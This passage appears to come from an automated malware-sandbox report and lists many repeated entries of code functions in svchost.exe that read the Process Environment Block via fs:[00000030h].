Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B2C0 mov eax, dword ptr fs:[00000030h]	1_2_03B5B2C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B392C5 mov eax, dword ptr fs:[00000030h]	1_2_03B392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B392C5 mov eax, dword ptr fs:[00000030h]	1_2_03B392C5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2823B mov eax, dword ptr fs:[00000030h]	1_2_03B2823B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B67208 mov eax, dword ptr fs:[00000030h]	1_2_03B67208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B67208 mov eax, dword ptr fs:[00000030h]	1_2_03B67208
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B59274 mov eax, dword ptr fs:[00000030h]	1_2_03B59274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B71270 mov eax, dword ptr fs:[00000030h]	1_2_03B71270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B71270 mov eax, dword ptr fs:[00000030h]	1_2_03B71270
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE0274 mov eax, dword ptr fs:[00000030h]	1_2_03BE0274
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B34260 mov eax, dword ptr fs:[00000030h]	1_2_03B34260
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFD26B mov eax, dword ptr fs:[00000030h]	1_2_03BFD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BFD26B mov eax, dword ptr fs:[00000030h]	1_2_03BFD26B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2826B mov eax, dword ptr fs:[00000030h]	1_2_03B2826B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A250 mov eax, dword ptr fs:[00000030h]	1_2_03B2A250
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C05227 mov eax, dword ptr fs:[00000030h]	1_2_03C05227
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEB256 mov eax, dword ptr fs:[00000030h]	1_2_03BEB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEB256 mov eax, dword ptr fs:[00000030h]	1_2_03BEB256
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36259 mov eax, dword ptr fs:[00000030h]	1_2_03B36259
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29240 mov eax, dword ptr fs:[00000030h]	1_2_03B29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29240 mov eax, dword ptr fs:[00000030h]	1_2_03B29240
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB8243 mov eax, dword ptr fs:[00000030h]	1_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB8243 mov ecx, dword ptr fs:[00000030h]	1_2_03BB8243
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6724D mov eax, dword ptr fs:[00000030h]	1_2_03B6724D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4B1B0 mov eax, dword ptr fs:[00000030h]	1_2_03B4B1B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C051CB mov eax, dword ptr fs:[00000030h]	1_2_03C051CB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	1_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	1_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	1_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BE11A4 mov eax, dword ptr fs:[00000030h]	1_2_03BE11A4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB019F mov eax, dword ptr fs:[00000030h]	1_2_03BB019F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A197 mov eax, dword ptr fs:[00000030h]	1_2_03B2A197
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C061E5 mov eax, dword ptr fs:[00000030h]	1_2_03C061E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B87190 mov eax, dword ptr fs:[00000030h]	1_2_03B87190
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B70185 mov eax, dword ptr fs:[00000030h]	1_2_03B70185
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]	1_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BEC188 mov eax, dword ptr fs:[00000030h]	1_2_03BEC188
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD71F9 mov esi, dword ptr fs:[00000030h]	1_2_03BD71F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B601F8 mov eax, dword ptr fs:[00000030h]	1_2_03B601F8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B551EF mov eax, dword ptr fs:[00000030h]	1_2_03B551EF
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B351ED mov eax, dword ptr fs:[00000030h]	1_2_03B351ED
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6D1D0 mov eax, dword ptr fs:[00000030h]	1_2_03B6D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6D1D0 mov ecx, dword ptr fs:[00000030h]	1_2_03B6D1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov ecx, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAE1D0 mov eax, dword ptr fs:[00000030h]	1_2_03BAE1D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF61C3 mov eax, dword ptr fs:[00000030h]	1_2_03BF61C3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B31131 mov eax, dword ptr fs:[00000030h]	1_2_03B31131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B31131 mov eax, dword ptr fs:[00000030h]	1_2_03B31131
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B136 mov eax, dword ptr fs:[00000030h]	1_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B136 mov eax, dword ptr fs:[00000030h]	1_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B136 mov eax, dword ptr fs:[00000030h]	1_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2B136 mov eax, dword ptr fs:[00000030h]	1_2_03B2B136
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C05152 mov eax, dword ptr fs:[00000030h]	1_2_03C05152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B60124 mov eax, dword ptr fs:[00000030h]	1_2_03B60124
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov ecx, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BDA118 mov eax, dword ptr fs:[00000030h]	1_2_03BDA118
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF0115 mov eax, dword ptr fs:[00000030h]	1_2_03BF0115
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F172 mov eax, dword ptr fs:[00000030h]	1_2_03B2F172
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC9179 mov eax, dword ptr fs:[00000030h]	1_2_03BC9179
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B37152 mov eax, dword ptr fs:[00000030h]	1_2_03B37152
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C156 mov eax, dword ptr fs:[00000030h]	1_2_03B2C156
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC8158 mov eax, dword ptr fs:[00000030h]	1_2_03BC8158
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]	1_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B36154 mov eax, dword ptr fs:[00000030h]	1_2_03B36154
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov ecx, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC4144 mov eax, dword ptr fs:[00000030h]	1_2_03BC4144
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29148 mov eax, dword ptr fs:[00000030h]	1_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29148 mov eax, dword ptr fs:[00000030h]	1_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29148 mov eax, dword ptr fs:[00000030h]	1_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B29148 mov eax, dword ptr fs:[00000030h]	1_2_03B29148
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF60B8 mov eax, dword ptr fs:[00000030h]	1_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF60B8 mov ecx, dword ptr fs:[00000030h]	1_2_03BF60B8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BC80A8 mov eax, dword ptr fs:[00000030h]	1_2_03BC80A8
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C050D9 mov eax, dword ptr fs:[00000030h]	1_2_03C050D9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B35096 mov eax, dword ptr fs:[00000030h]	1_2_03B35096
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5D090 mov eax, dword ptr fs:[00000030h]	1_2_03B5D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5D090 mov eax, dword ptr fs:[00000030h]	1_2_03B5D090
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B6909C mov eax, dword ptr fs:[00000030h]	1_2_03B6909C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B3208A mov eax, dword ptr fs:[00000030h]	1_2_03B3208A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2D08D mov eax, dword ptr fs:[00000030h]	1_2_03B2D08D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C0F0 mov eax, dword ptr fs:[00000030h]	1_2_03B2C0F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B720F0 mov ecx, dword ptr fs:[00000030h]	1_2_03B720F0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B550E4 mov eax, dword ptr fs:[00000030h]	1_2_03B550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B550E4 mov ecx, dword ptr fs:[00000030h]	1_2_03B550E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A0E3 mov ecx, dword ptr fs:[00000030h]	1_2_03B2A0E3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B380E9 mov eax, dword ptr fs:[00000030h]	1_2_03B380E9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB60E0 mov eax, dword ptr fs:[00000030h]	1_2_03BB60E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB20DE mov eax, dword ptr fs:[00000030h]	1_2_03BB20DE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B590DB mov eax, dword ptr fs:[00000030h]	1_2_03B590DB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov ecx, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B470C0 mov eax, dword ptr fs:[00000030h]	1_2_03B470C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAD0C0 mov eax, dword ptr fs:[00000030h]	1_2_03BAD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAD0C0 mov eax, dword ptr fs:[00000030h]	1_2_03BAD0C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF903E mov eax, dword ptr fs:[00000030h]	1_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF903E mov eax, dword ptr fs:[00000030h]	1_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF903E mov eax, dword ptr fs:[00000030h]	1_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BF903E mov eax, dword ptr fs:[00000030h]	1_2_03BF903E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2A020 mov eax, dword ptr fs:[00000030h]	1_2_03B2A020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2C020 mov eax, dword ptr fs:[00000030h]	1_2_03B2C020
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03C05060 mov eax, dword ptr fs:[00000030h]	1_2_03C05060
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B4E016 mov eax, dword ptr fs:[00000030h]	1_2_03B4E016
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB4000 mov ecx, dword ptr fs:[00000030h]	1_2_03BB4000
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov ecx, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B41070 mov eax, dword ptr fs:[00000030h]	1_2_03B41070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5C073 mov eax, dword ptr fs:[00000030h]	1_2_03B5C073
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BAD070 mov ecx, dword ptr fs:[00000030h]	1_2_03BAD070
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB106E mov eax, dword ptr fs:[00000030h]	1_2_03BB106E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B32050 mov eax, dword ptr fs:[00000030h]	1_2_03B32050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD705E mov ebx, dword ptr fs:[00000030h]	1_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BD705E mov eax, dword ptr fs:[00000030h]	1_2_03BD705E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5B052 mov eax, dword ptr fs:[00000030h]	1_2_03B5B052
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03BB6050 mov eax, dword ptr fs:[00000030h]	1_2_03BB6050
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B5D7B0 mov eax, dword ptr fs:[00000030h]	1_2_03B5D7B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 1_2_03B2F7BA mov eax, dword ptr fs:[00000030h]	1_2_03B2F7BA
